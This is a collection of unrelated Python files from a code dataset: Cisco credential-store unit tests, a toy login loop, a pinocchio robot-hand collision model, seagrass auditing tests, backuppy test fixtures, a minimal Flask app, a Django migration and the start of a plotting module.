cred = self._network_plugin.get_credential_details(cred21_id)
self._assert_equal(cred, cred21)
cred = self._network_plugin.get_credential_details(cred22_id)
self._assert_equal(cred, cred22)
with testtools.ExpectedException(c_exc.CredentialNotFound):
self._network_plugin.get_credential_details("dummyCredentialId")
cred_all_t1 = self._network_plugin.get_all_credentials()
self.assertEqual(len(cred_all_t1), 3)
def test_credential_get_name(self):
cred11 = self._cred_test_obj(1, 1)
cred11_id = cdb.add_credential(
cred11.cname, cred11.usr, cred11.pwd, cred11.ctype).credential_id
cred21 = self._cred_test_obj(2, 1)
cred21_id = cdb.add_credential(
cred21.cname, cred21.usr, cred21.pwd, cred21.ctype).credential_id
cred22 = self._cred_test_obj(2, 2)
cred22_id = cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype).credential_id
self.assertNotEqual(cred11_id, cred21_id)
self.assertNotEqual(cred11_id, cred22_id)
self.assertNotEqual(cred21_id, cred22_id)
cred = cdb.get_credential_name(cred11.cname)
self._assert_equal(cred, cred11)
cred = cdb.get_credential_name(cred21.cname)
self._assert_equal(cred, cred21)
cred = cdb.get_credential_name(cred22.cname)
self._assert_equal(cred, cred22)
with testtools.ExpectedException(c_exc.CredentialNameNotFound):
cdb.get_credential_name("dummyCredentialName")
def test_credential_update(self):
cred11 = self._cred_test_obj(1, 1)
cred11_id = cdb.add_credential(
cred11.cname, cred11.usr, cred11.pwd, cred11.ctype).credential_id
self._network_plugin.rename_credential(cred11_id, new_name=None,
new_password=None)
new_usr = "new user name"
new_pwd = "<PASSWORD>"
new_credential = self._network_plugin.rename_credential(
cred11_id, new_usr, new_pwd)
expected_cred = self.CredObj(
cred11.cname, new_usr, new_pwd, cred11.ctype)
self._assert_equal(new_credential, expected_cred)
new_credential = self._network_plugin.get_credential_details(
cred11_id)
self._assert_equal(new_credential, expected_cred)
with testtools.ExpectedException(c_exc.CredentialNotFound):
self._network_plugin.rename_credential(
"dummyCredentialId", new_usr, new_pwd)
def test_get_credential_not_found_exception(self):
self.assertRaises(c_exc.CredentialNotFound,
self._network_plugin.get_credential_details,
"dummyCredentialId")
def test_credential_delete_all_n1kv(self):
cred_nexus_1 = self._cred_test_obj('nexus', 1)
cred_nexus_2 = self._cred_test_obj('nexus', 2)
cred_n1kv_1 = self.CredObj('n1kv-1', 'cisco', '123456', 'n1kv')
cred_n1kv_2 = self.CredObj('n1kv-2', 'cisco', '123456', 'n1kv')
cred_nexus_1_id = cdb.add_credential(
cred_nexus_1.cname, cred_nexus_1.usr,
cred_nexus_1.pwd, cred_nexus_1.ctype).credential_id
cred_nexus_2_id = cdb.add_credential(
cred_nexus_2.cname, cred_nexus_2.usr,
cred_nexus_2.pwd, cred_nexus_2.ctype).credential_id
cred_n1kv_1_id = cdb.add_credential(
cred_n1kv_1.cname, cred_n1kv_1.usr,
cred_n1kv_1.pwd, cred_n1kv_1.ctype).credential_id
cred_n1kv_2_id = cdb.add_credential(
cred_n1kv_2.cname, cred_n1kv_2.usr,
cred_n1kv_2.pwd, cred_n1kv_2.ctype).credential_id
cdb.delete_all_n1kv_credentials()
cred = cdb.get_credential(cred_nexus_1_id)
self.assertIsNotNone(cred)
cred = cdb.get_credential(cred_nexus_2_id)
self.assertIsNotNone(cred)
self.assertRaises(c_exc.CredentialNotFound,
cdb.get_credential, cred_n1kv_1_id)
self.assertRaises(c_exc.CredentialNotFound,
cdb.get_credential, cred_n1kv_2_id)
class CiscoCredentialStoreTest(base.BaseTestCase):
"""Cisco Credential Store unit tests."""
def setUp(self):
super(CiscoCredentialStoreTest, self).setUp()
db.configure_db()
self.addCleanup(db.clear_db)
def test_cred_store_init_duplicate_creds_ignored(self):
"""Check that with multi store instances, dup creds are ignored."""
# Create a device dictionary containing credentials for 1 switch.
dev_dict = {
('dev_id', '1.1.1.1', cisco_constants.USERNAME): 'user_1',
('dev_id', '1.1.1.1', cisco_constants.PASSWORD): '<PASSWORD>',
('dev_id', '1.1.1.1', 'host_a'): '1/1',
('dev_id', '1.1.1.1', 'host_b'): '1/2',
('dev_id', '1.1.1.1', 'host_c'): '1/3',
}
with mock.patch.object(config, 'get_device_dictionary',
return_value=dev_dict):
# Create and initialize 2 instances of credential store.
cisco_credentials_v2.Store().initialize()
cisco_credentials_v2.Store().initialize()
# There should be only 1 switch credential in the database.
self.assertEqual(len(cdb.get_all_credentials()), 1)
| StarcoderdataPython |
4821291 | <gh_stars>0
x=0;
while x<=4:
## x+=1;
user = input("Dame tu susario ");
password = input("<PASSWORD> ");
if user=="Alex" and password=="<PASSWORD>" :
print("Bienvenido "+ user);
x=5
elif user!="Alex" and password=="<PASSWORD>":
print("Usuario Incorrecto");
print("intento "+ str(x+1));
x+=1;
elif password!="<PASSWORD>" and user=="Alex":
print("Contraseña incorrecta");
print("intento "+ str(x+1));
x+=1;
else:
print("Validar datos");
print("intento "+ str(x+1));
x+=1;
if x==3:
print("Usario Bloqueado");
x=5
| StarcoderdataPython |
3551881 | <reponame>matthieuvigne/pinocchio
from math import pi
import numpy as np
from numpy.linalg import norm, pinv
import pinocchio as se3
from pinocchio.utils import cross, zero, rotate, eye
from display import Display
class Visual(object):
'''
Class representing one 3D mesh of the robot, to be attached to a joint. The class contains:
* the name of the 3D objects inside Gepetto viewer.
* the ID of the joint in the kinematic tree to which the body is attached.
* the placement of the body with respect to the joint frame.
This class is only used in the list Robot.visuals (see below).
The visual are supposed mostly to be capsules. In that case, the object also contains
radius and length of the capsule.
The collision checking computes collision test, distance, and witness points.
Using the supporting robot, the collision Jacobian returns a 1xN matrix corresponding
to the normal direction.
'''
def __init__(self, name, jointParent, placement, radius=.1, length=None):
'''Length and radius are used in case of capsule objects'''
self.name = name # Name in gepetto viewer
self.jointParent = jointParent # ID (int) of the joint
self.placement = placement # placement of the body wrt joint, i.e. bodyMjoint
if length is not None:
self.length = length
self.radius = radius
def place(self, display, oMjoint):
oMbody = oMjoint * self.placement
display.place(self.name, oMbody, False)
def isCapsule(self):
return hasattr(self, 'length') and hasattr(self, 'radius')
def collision(self, c2, data=None, oMj1=None, oMj2=None):
if data is not None:
oMj1 = data.oMi[self.jointParent]
oMj2 = data.oMi[c2.jointParent]
M1 = oMj1 * self.placement
M2 = oMj2 * c2.placement
assert(self.isCapsule() and c2.isCapsule())
l1 = self.length
r1 = self.radius
l2 = c2.length
r2 = c2.radius
a1 = M1.act(np.matrix([0, 0, -l1 / 2]).T)
b1 = M2.act(np.matrix([0, 0, -l2 / 2]).T)
a2 = M1.act(np.matrix([0, 0, +l1 / 2]).T)
b2 = M2.act(np.matrix([0, 0, +l2 / 2]).T)
ab = pinv(np.hstack([a1 - a2, b2 - b1])) * (b2 - a2)
if all(0 <= ab <= 1):
asat = bsat = False
pa = a2 + ab[0, 0] * (a1 - a2)
pb = b2 + ab[1, 0] * (b1 - b2)
else:
asat = bsat = True
i = np.argmin(np.vstack([ab, 1 - ab]))
pa = a2 if i == 0 else a1
pb = b2 if i == 1 else b1
if i == 0 or i == 2: # fix a to pa, search b
b = (pinv(b1 - b2) * (pa - b2))[0, 0]
if b < 0:
pb = b2
elif b > 1:
pb = b1
else:
pb = b2 + b * (b1 - b2)
bsat = False
else: # fix b
a = (pinv(a1 - a2) * (pb - a2))[0, 0]
if a < 0:
pa = a2
elif a > 1:
pa = a1
else:
pa = a2 + a * (a1 - a2)
asat = False
dist = norm(pa - pb) - (r1 + r2)
if norm(pa - pb) > 1e-3:
# Compute witness points
ab = pa - pb
ab /= norm(ab)
wa = pa - ab * r1
wb = pb + ab * r2
# Compute normal matrix
x = np.matrix([1., 0, 0]).T
r1 = cross(ab, x)
if norm(r1) < 1e-2:
x = np.matrix([0, 1., 0]).T
r1 = cross(ab, x)
r1 /= norm(r1)
r2 = cross(ab, r1)
R = np.hstack([r1, r2, ab])
self.dist = dist
c2.dist = dist
self.w = wa
c2.w = wb
self.R = R
c2.R = R
return dist
def jacobian(self, c2, robot, q):
Ja = se3.jacobian(robot.model, robot.data, q, self.jointParent, False, True)
Jb = se3.jacobian(robot.model, robot.data, q, c2.jointParent, False, True)
Xa = se3.SE3(self.R, self.w).action
Xb = se3.SE3(c2.R, c2.w).action
J = (Xa * Ja)[2, :] - (Xb * Jb)[2, :]
return J
def displayCollision(self, viewer, name='world/wa'):
viewer.viewer.gui.setVisibility(name, 'ON')
viewer.place(name, se3.SE3(self.R, self.w))
class Robot(object):
'''
Define a class Robot with 7DOF (shoulder=3 + elbow=1 + wrist=3).
The configuration is nq=7. The velocity is the same.
The members of the class are:
* viewer: a display encapsulating a gepetto viewer client to create 3D objects and place them.
* model: the kinematic tree of the robot.
* data: the temporary variables to be used by the kinematic algorithms.
* visuals: the list of all the 'visual' 3D objects to render the robot, each element of the list being
an object Visual (see above).
CollisionPairs is a list of visual indexes.
Reference to the collision pair is used in the collision test and jacobian of the collision
(which are simply proxy method to methods of the visual class).
'''
def __init__(self):
self.viewer = Display()
self.visuals = []
self.model = se3.Model()
self.createHand()
self.data = self.model.createData()
self.q0 = zero(self.model.nq)
# self.q0[3] = 1.0
self.v0 = zero(self.model.nv)
self.collisionPairs = []
def createHand(self, root_id=0, prefix='', joint_placement=None):
def trans(x, y, z):
return se3.SE3(eye(3), np.matrix([x, y, z]).T)
def inertia(m, c):
return se3.Inertia(m, np.matrix(c, np.double).T, eye(3) * m ** 2)
def joint_name(body):
return prefix + body + '_joint'
def body_name(body):
return 'world/' + prefix + body
color = [red, green, blue, transparency] = [1, 1, 0.78, 1.0]
joint_id = root_id
cm = 1e-2
joint_placement = joint_placement if joint_placement is not None else se3.SE3.Identity()
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('wrist'))
self.model.appendBodyToJoint(joint_id, inertia(3, [0, 0, 0]), se3.SE3.Identity())
L, W, H = 3 * cm, 5 * cm, 1 * cm
self.viewer.viewer.gui.addSphere(body_name('wrist'), .02, color)
self.viewer.viewer.gui.addBox(body_name('wpalm'), L / 2, W / 2, H, color)
self.visuals.append(Visual(body_name('wpalm'), joint_id, trans(L / 2, 0, 0)))
self.viewer.viewer.gui.addCapsule(body_name('wpalmb'), H, W, color)
self.visuals.append(Visual(body_name('wpalmb'), joint_id, se3.SE3(rotate('x', pi / 2), zero(3)), H, W))
self.viewer.viewer.gui.addCapsule(body_name('wpalmt'), H, W, color)
pos = se3.SE3(rotate('x', pi / 2), np.matrix([L, 0, 0]).T)
self.visuals.append(Visual(body_name('wpalmt'), joint_id, pos, H, W))
self.viewer.viewer.gui.addCapsule(body_name('wpalml'), H, L, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([L / 2, -W / 2, 0]).T)
self.visuals.append(Visual(body_name('wpalml'), joint_id, pos, H, L))
self.viewer.viewer.gui.addCapsule(body_name('wpalmr'), H, L, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([L / 2, +W / 2, 0]).T)
self.visuals.append(Visual(body_name('wpalmr'), joint_id, pos, H, L))
joint_placement = se3.SE3(eye(3), np.matrix([5 * cm, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('palm'))
self.model.appendBodyToJoint(joint_id, inertia(2, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('palm2'), 1 * cm, W, color)
self.visuals.append(Visual(body_name('palm2'), joint_id, se3.SE3(rotate('x', pi / 2), zero(3)), H, W))
FL = 4 * cm
palmIdx = joint_id
joint_placement = se3.SE3(eye(3), np.matrix([2 * cm, W / 2, 0]).T)
joint_id = self.model.addJoint(palmIdx, se3.JointModelRY(), joint_placement, joint_name('finger11'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('finger11'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
self.visuals.append(Visual(body_name('finger11'), joint_id, pos, H, FL - 2 * H))
joint_placement = se3.SE3(eye(3), np.matrix([FL, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger12'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('finger12'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
self.visuals.append(Visual(body_name('finger12'), joint_id, pos, H, FL - 2 * H))
joint_placement = se3.SE3(eye(3), np.matrix([FL - 2 * H, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger13'))
self.model.appendBodyToJoint(joint_id, inertia(.3, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addSphere(body_name('finger13'), H, color)
self.visuals.append(Visual(body_name('finger13'), joint_id, trans(2 * H, 0, 0), H, 0))
joint_placement = se3.SE3(eye(3), np.matrix([2 * cm, 0, 0]).T)
joint_id = self.model.addJoint(palmIdx, se3.JointModelRY(), joint_placement, joint_name('finger21'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('finger21'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
self.visuals.append(Visual(body_name('finger21'), joint_id, pos, H, FL - 2 * H))
joint_placement = se3.SE3(eye(3), np.matrix([FL, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger22'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('finger22'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
self.visuals.append(Visual(body_name('finger22'), joint_id, pos, H, FL - 2 * H))
joint_placement = se3.SE3(eye(3), np.matrix([FL - H, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger23'))
self.model.appendBodyToJoint(joint_id, inertia(.3, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addSphere(body_name('finger23'), H, color)
self.visuals.append(Visual(body_name('finger23'), joint_id, trans(H, 0, 0), H, 0))
joint_placement = se3.SE3(eye(3), np.matrix([2 * cm, -W / 2, 0]).T)
joint_id = self.model.addJoint(palmIdx, se3.JointModelRY(), joint_placement, joint_name('finger31'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('finger31'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
self.visuals.append(Visual(body_name('finger31'), joint_id, pos, H, FL - 2 * H))
joint_placement = se3.SE3(eye(3), np.matrix([FL, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger32'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('finger32'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('y', pi / 2), np.matrix([FL / 2 - H, 0, 0]).T)
self.visuals.append(Visual(body_name('finger32'), joint_id, pos, H, FL - 2 * H))
joint_placement = se3.SE3(eye(3), np.matrix([FL - 2 * H, 0, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRY(), joint_placement, joint_name('finger33'))
self.model.appendBodyToJoint(joint_id, inertia(.3, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addSphere(body_name('finger33'), H, color)
self.visuals.append(Visual(body_name('finger33'), joint_id, trans(2 * H, 0, 0), H, 0))
joint_placement = se3.SE3(eye(3), np.matrix([1 * cm, -W / 2 - H * 1.5, 0]).T)
joint_id = self.model.addJoint(1, se3.JointModelRY(), joint_placement, joint_name('thumb1'))
self.model.appendBodyToJoint(joint_id, inertia(.5, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('thumb1'), H, 2 * cm, color)
pos = se3.SE3(rotate('z', pi / 3) * rotate('x', pi / 2), np.matrix([1 * cm, -1 * cm, 0]).T)
self.visuals.append(Visual(body_name('thumb1'), joint_id, pos, 2 * cm))
joint_placement = se3.SE3(rotate('z', pi / 3) * rotate('x', pi), np.matrix([3 * cm, -1.8 * cm, 0]).T)
joint_id = self.model.addJoint(joint_id, se3.JointModelRZ(), joint_placement, joint_name('thumb2'))
self.model.appendBodyToJoint(joint_id, inertia(.4, [0, 0, 0]), se3.SE3.Identity())
self.viewer.viewer.gui.addCapsule(body_name('thumb2'), H, FL - 2 * H, color)
pos = se3.SE3(rotate('x', pi / 3), np.matrix([-0.7 * cm, .8 * cm, -0.5 * cm]).T)
self.visuals.append(Visual(body_name('thumb2'), joint_id, pos, H, FL - 2 * H))
# Prepare some patches to represent collision points. Yet unvisible.
for i in range(10):
self.viewer.viewer.gui.addCylinder('world/wa%i' % i, .01, .003, [1.0, 0, 0, 1])
self.viewer.viewer.gui.addCylinder('world/wb%i' % i, .01, .003, [1.0, 0, 0, 1])
self.viewer.viewer.gui.setVisibility('world/wa%i' % i, 'OFF')
self.viewer.viewer.gui.setVisibility('world/wb%i' % i, 'OFF')
def checkCollision(self, pairIndex):
ia, ib = self.collisionPairs[pairIndex]
va = self.visuals[ia]
vb = self.visuals[ib]
dist = va.collision(vb, self.data)
return dist
def collisionJacobian(self, pairIndex, q):
ia, ib = self.collisionPairs[pairIndex]
va = self.visuals[ia]
vb = self.visuals[ib]
return va.jacobian(vb, self, q)
def displayCollision(self, pairIndex, meshIndex, onlyOne=False):
ia, ib = self.collisionPairs[pairIndex]
va = self.visuals[ia]
vb = self.visuals[ib]
va.displayCollision(self.viewer, 'world/wa%i' % meshIndex)
vb.displayCollision(self.viewer, 'world/wb%i' % meshIndex)
self.viewer.viewer.gui.setVisibility('world/wa%i' % meshIndex, 'ON')
self.viewer.viewer.gui.setVisibility('world/wb%i' % meshIndex, 'ON')
def display(self, q):
se3.forwardKinematics(self.model, self.data, q)
for visual in self.visuals:
visual.place(self.viewer, self.data.oMi[visual.jointParent])
self.viewer.viewer.gui.refresh()
| StarcoderdataPython |
8001279 | <reponame>kernelmethod/Seagrass
import seagrass
import sys
import unittest
import warnings
from collections import Counter, defaultdict
from seagrass import auto, get_current_event
from seagrass.hooks import CounterHook
from test.utils import SeagrassTestCaseMixin, req_python_version
with seagrass.create_global_auditor() as _:
class ExampleClass:
# Test class used to check how functions are auto-named by Seagrass
@staticmethod
@seagrass.audit(auto)
def say_hello(name: str) -> str:
return f"Hello, {name}!"
class EventsTestCase(SeagrassTestCaseMixin, unittest.TestCase):
"""Tests for events created by Seagrass."""
def test_wrap_class_property(self):
# Override a class property to call a hook whenever it's accessed
class Foo:
def __init__(self):
self.x = 0
def add_one(self):
return self.x + 1
hook = CounterHook()
@self.auditor.audit("test.foo.get_x", hooks=[hook])
def get_x(self):
return self.__x
@self.auditor.audit("test.foo.set_x", hooks=[hook])
def set_x(self, val):
self.__x = val
@self.auditor.audit("test.foo.del_x", hooks=[hook])
def del_x(self):
del self.__x
setattr(Foo, "x", property(fget=get_x, fset=set_x, fdel=del_x))
with self.auditor.start_auditing():
f = Foo()
f.x = 1
y = f.x # noqa: F841
f.x += 2
del f.x
# We call get_x twice (once for y = f.x, another for f.x += 2)
# We call set_x three times (once during Foo.__init__, once during f.x = 1, and
# once during f.x += 2)
# We call del_x once (when we call del f.x)
self.assertEqual(hook.event_counter["test.foo.get_x"], 2)
self.assertEqual(hook.event_counter["test.foo.set_x"], 3)
self.assertEqual(hook.event_counter["test.foo.del_x"], 1)
# Now override the add_one function belonging to Foo
current_add_one = Foo.add_one
@self.auditor.audit("test.foo.add_one", hooks=[hook])
def add_one(self, *args, **kwargs):
return current_add_one(self, *args, **kwargs)
setattr(Foo, "add_one", add_one)
with self.auditor.start_auditing():
f = Foo()
result = f.add_one()
self.assertEqual(result, 1)
self.assertEqual(hook.event_counter["test.foo.add_one"], 1)
def test_toggle_event(self):
hook = CounterHook()
@self.auditor.audit("test.foo", hooks=[hook])
def foo():
return
@self.auditor.audit("test.bar", hooks=[hook])
def bar():
return foo()
with self.auditor.start_auditing():
bar()
self.assertEqual(hook.event_counter["test.foo"], 1)
self.assertEqual(hook.event_counter["test.bar"], 1)
# After disabling an event, its event hooks should no longer be called
self.auditor.toggle_event("test.foo", False)
bar()
self.assertEqual(hook.event_counter["test.foo"], 1)
self.assertEqual(hook.event_counter["test.bar"], 2)
# Now we re-enable the event so that hooks get called again
self.auditor.toggle_event("test.foo", True)
bar()
self.assertEqual(hook.event_counter["test.foo"], 2)
self.assertEqual(hook.event_counter["test.bar"], 3)
@req_python_version(min=(3, 8))
def test_wrap_function_and_create_sys_audit_event(self):
# We should be able to set up sys.audit events when we wrap functions
@self.auditor.audit("test.foo", raise_runtime_events=True)
def foo(x, y, z=None):
return x + y + (0 if z is None else z)
@self.auditor.audit("test.bar", raise_runtime_events=False)
def bar(x, y, z=None):
return x + y + (0 if z is None else z)
@self.auditor.audit(
"test.baz",
raise_runtime_events=True,
prehook_audit_event_name="baz_prehook",
posthook_audit_event_name="baz_posthook",
)
def baz(x, y, z=None):
return x + y + (0 if z is None else z)
events_counter = Counter()
args_dict = defaultdict(list)
def audit_hook(event: str, *args):
try:
if event.startswith("prehook:") or event.startswith("posthook:"):
events_counter[event] += 1
args_dict[event].append(args)
elif event in ("baz_prehook", "baz_posthook"):
events_counter[event] += 1
args_dict[event].append(args)
except Exception as ex:
warnings.warn(f"Exception raised in audit_hook: ex={ex}")
sys.addaudithook(audit_hook)
test_args = [(-3, 4), (5, 8), (0, 0)]
test_kwargs = [{}, {}, {"z": 1}]
def run_fns(args_list, kwargs_list):
for (args, kwargs) in zip(args_list, kwargs_list):
for fn in (foo, bar, baz):
fn(*args, **kwargs)
# The following call to run_fns shouldn't raise any audit events since
# it isn't performed in an auditing context.
run_fns(test_args, test_kwargs)
self.assertEqual(set(events_counter), set())
self.assertEqual(set(args_dict), set())
# Now some audit events should be raised:
with self.auditor.start_auditing():
run_fns(test_args, test_kwargs)
expected_prehooks = ["prehook:test.foo", "baz_prehook"]
expected_posthooks = ["posthook:test.foo", "baz_posthook"]
self.assertEqual(
set(events_counter), set(expected_prehooks + expected_posthooks)
)
self.assertEqual(set(events_counter), set(args_dict))
for event in expected_prehooks:
self.assertEqual(events_counter[event], len(test_args))
args = [args[0][0] for args in args_dict[event]]
kwargs = [args[0][1] for args in args_dict[event]]
self.assertEqual(args, test_args)
self.assertEqual(kwargs, test_kwargs)
# If we try running our functions outside of an auditing context again,
# we should once again find that no system events are raised.
events_counter.clear()
args_dict.clear()
run_fns(test_args, test_kwargs)
self.assertEqual(set(events_counter), set())
self.assertEqual(set(args_dict), set())
@req_python_version(max=(3, 8))
def test_get_error_with_runtime_events_for_python_before_38(self):
"""For Python versions before 3.8, sys.audit and sys.addaudithook do not exist, so
an exception should be raised if raise_runtime_events=True."""
with self.assertRaises(NotImplementedError):
self.auditor.create_event("my_test_event", raise_runtime_events=True)
def test_auto_name_event(self):
from pathlib import Path
auhome = self.auditor.audit(auto, Path.home)
self.assertEqual(auhome.__event_name__, "pathlib.Path.home")
# Check the name of the audited function from the ExampleClass class at
# the top of the file.
self.assertEqual(
ExampleClass.say_hello.__event_name__, f"{__name__}.ExampleClass.say_hello"
)
def test_get_current_event(self):
@self.auditor.audit("test.foo")
def foo():
self.assertEqual(get_current_event(), "test.foo")
@self.auditor.audit("test.bar")
def bar():
self.assertEqual(get_current_event(), "test.bar")
foo()
self.assertEqual(get_current_event(), "test.bar")
with self.auditor.start_auditing():
foo()
bar()
# We should be able to specify a default value for get_current_event(). If no default is
# specified and an event isn't being executed, an exception should be thrown.
self.assertEqual(get_current_event(None), None)
with self.assertRaises(LookupError):
get_current_event()
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1648324 | <reponame>drmorr0/backuppy
import inspect
import os
import re
import sys
import traceback
from contextlib import contextmanager
from hashlib import sha256
from shutil import rmtree
import mock
import pytest
from backuppy.config import setup_config
from backuppy.manifest import MANIFEST_FILE
from backuppy.manifest import MANIFEST_PREFIX
from backuppy.run import setup_logging
ITEST_ROOT = 'itests'
ITEST_CONFIG = os.path.join(ITEST_ROOT, 'itest.conf')
DATA_DIRS = [os.path.join(ITEST_ROOT, 'data'), os.path.join(ITEST_ROOT, 'data2')]
BACKUP_DIR = os.path.join(ITEST_ROOT, 'backup', 'data1_backup')
RESTORE_DIR = os.path.join(ITEST_ROOT, 'restore')
ITEST_MANIFEST_PATH = os.path.join(BACKUP_DIR, MANIFEST_FILE)
ITEST_SCRATCH = os.path.join(ITEST_ROOT, 'scratch')
def compute_sha(string):
sha_fn = sha256()
sha_fn.update(string)
return sha_fn.hexdigest()
def get_latest_manifest():
return sorted([
os.path.join(BACKUP_DIR, f)
for f in os.listdir(BACKUP_DIR)
if f.startswith(MANIFEST_PREFIX)
])[-1]
@pytest.fixture(autouse=True, scope='session')
def initialize_session():
setup_config(ITEST_CONFIG)
setup_logging('debug')
@pytest.fixture(autouse=True, scope='module')
def initialize_module():
sys.settrace(lambda a, b, c: None)
for d in DATA_DIRS + [BACKUP_DIR, ITEST_SCRATCH]:
try:
rmtree(d)
except FileNotFoundError:
pass
[os.makedirs(d) for d in DATA_DIRS]
os.makedirs(BACKUP_DIR)
os.makedirs(ITEST_SCRATCH)
class ItestException(Exception):
pass
class _TestFileData:
def __init__(self, filename, contents, data_dir_index=0, mode=0o100644):
self.path = os.path.join(DATA_DIRS[data_dir_index], filename)
if contents:
self.contents = contents.encode()
self.sha = compute_sha(self.contents)
self.mode = mode
else:
self.contents = None
self.sha = None
self.mode = None
def write(self):
if self.contents:
os.makedirs(os.path.dirname(self.path), exist_ok=True)
with open(self.path, 'wb') as f:
f.write(self.contents)
os.chmod(self.path, self.mode)
else:
os.remove(self.path)
@property
def backup_path(self):
if self.sha:
return os.path.join(BACKUP_DIR, self.sha[:2], self.sha[2:4], self.sha[4:])
else:
return None
def __eq__(self, other):
return other and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
def make_trace_func(search_string, side_effect):
def trace_func(frame, event, arg):
if event == 'call':
try:
module = inspect.getmodule(frame)
except (TypeError, AttributeError):
return None
if module and not module.__name__.startswith('backuppy'):
if not hasattr(frame, 'f_trace_lines'):
return None
frame.f_trace_lines = False
return trace_func
elif event == 'line':
line = traceback.extract_stack(frame, limit=1)[0].line
m = re.search(f'#\s+{search_string}', line)
if m:
# Note that if side_effect() raises an Exception, the trace function will
# no longer function, because this must return a reference to trace_func and
# raising doesn't return; the practical effect of this is that each individual
# itest can only inject one "crash" into the application. I think this is
# generally OK, since itests "shouldn't" be testing multiple things at once
side_effect()
return trace_func
return trace_func
@contextmanager
def itest_setup(
test_file_history,
*dec_args,
):
for tfd in dec_args:
if tfd.path in test_file_history and tfd != test_file_history[tfd.path][-1]:
test_file_history[tfd.path].append(tfd)
tfd.write()
elif tfd.path not in test_file_history:
test_file_history[tfd.path] = [tfd]
tfd.write()
with mock.patch('backuppy.stores.backup_store.get_scratch_dir') as mock_scratch_1, \
mock.patch('backuppy.manifest.get_scratch_dir') as mock_scratch_2, \
mock.patch('backuppy.util.shuffle') as mock_shuffle, \
mock.patch('backuppy.cli.restore.ask_for_confirmation', return_value=True):
# make sure tests are repeatable, no directory-shuffling
mock_shuffle.side_effect = lambda l: l.sort()
mock_scratch_1.return_value = ITEST_SCRATCH
mock_scratch_2.return_value = ITEST_SCRATCH
yield
| StarcoderdataPython |
3252396 | import os
from flask import Flask
from flask import jsonify
app = Flask(__name__)
@app.route('/')
def hello():
response = {
'message': 'API Bookmark',
'version': '1.0.0',
'code': 200,
}
return jsonify(response)
#return app
if __name__ == '__main__':
app.run() | StarcoderdataPython |
4929435 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-10 09:13
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
def set_inaugural_grant_expiration(apps, schema_editor): # pylint: disable=unused-argument
Claimant = apps.get_model("lowfat", "Claimant") # pylint: disable=invalid-name
for claimant in Claimant.objects.all():
claimant.inauguration_grant_expiration = datetime.date(
claimant.application_year + 2,
3,
31
)
claimant.save()
class Migration(migrations.Migration):
dependencies = [
('lowfat', '0101_auto_20170426_1007'),
]
operations = [
migrations.AddField(
model_name='claimant',
name='inauguration_grant_expiration',
field=models.DateField(default=datetime.date(2019, 3, 31)),
),
migrations.RunPython(set_inaugural_grant_expiration),
migrations.AddField(
model_name='historicalclaimant',
name='inauguration_grant_expiration',
field=models.DateField(default=datetime.date(2019, 3, 31)),
),
]
| StarcoderdataPython |
11323987 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
from .parametric_dqn import ParametricDQN
__all__ = ["ParametricDQN"]
| StarcoderdataPython |
6489146 | <reponame>rnsheehan/Matrix_Methods
# Import libraries
# You should try an import the bare minimum of modules
import sys # access system routines
import os
import glob
import re
import math
import scipy
import numpy as np
import matplotlib.pyplot as plt
# add path to our file
sys.path.append('c:/Users/Robert/Programming/Python/Common/')
sys.path.append('c:/Users/Robert/Programming/Python/Plotting/')
import Common
import Plotting
MOD_NAME_STR = "Plots" # use this in exception handling messages
def iface_r_t():
# make a plot of the computed interface reflection / transmission curves
# <NAME> 15 - 6 - 2020
FUNC_NAME = ".iface_r_t()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
